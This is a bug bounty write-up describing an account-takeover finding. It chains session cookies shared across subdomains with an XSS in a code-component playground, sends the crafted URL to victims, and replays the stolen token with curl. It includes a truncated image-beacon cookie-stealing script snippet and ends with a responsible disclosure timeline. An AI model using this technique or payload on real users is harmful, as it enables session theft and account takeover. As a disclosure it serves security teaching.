Hi , I’m Bijan (0xBijan) , today I’m gonna share one of my finding on ATO bugs .

Few months back I was hunting on a private program , let’s call it redacted.com for program policy and privacy . Everything under *.redacted.com was in scope .

So , dashboard.redacted.com was the main surface of the program , where users can create account and upload files and many more . When I logged into my account at dashboard.redacted.com , my Auth token was stored inside unifiedDashboardAuth parameter under Set-Cookie header .

For an authenticated user Auth token is everything . If anyone has your authorization token , that means that guy has full access of your account.

Now whenever you logged in to dashboard.redacted.com , that cookies (with authorization token) shared over all subdomains . Means if you find XSS on any of subdomains , you can steal cookies easily (no strict CSP implemented ) .

After that I found a subdomain , which had this component playground kinda thing ,where you can create code component and run that . I noticed one thing whenever you edit/create code component , that URL address bar changed every time.

You can see that difference in URL below . Also it was possible to inject JavaScript code but many juicy functions are filtered/blocked .

If you copy the URL after create a malicious code component and share to others , you can steal their cookies easily . Also I did the same .

I created a code component and copy the URL .

export default () => {
  return <script>
var i=new Image;

Now , send that URL address to victim(who logged into dashboard account) and wait for the listener to receive data . Once you receive the cookie , you will see unifiedDashboardAuth parameter holds the dashboard user account token .

Now add that token in the Authorization header or replace it with your token and make any request . You can access victim’s dashboard account . I made a curl request using stolen AuthToken to grab victim’s API token and it’s worked .

Remember: whenever you notice that cookies are getting share over subdomains , try to find XSS on subdomains if main surface domain has none .


Sept 9th , 2021 – Submitted report .

Sept 17th, 2021 – provided more info .

Sept 24th, 2021 – Triaged and set severity to HIGH 8.6

Oct 6th, 2021 – rewarded bounty .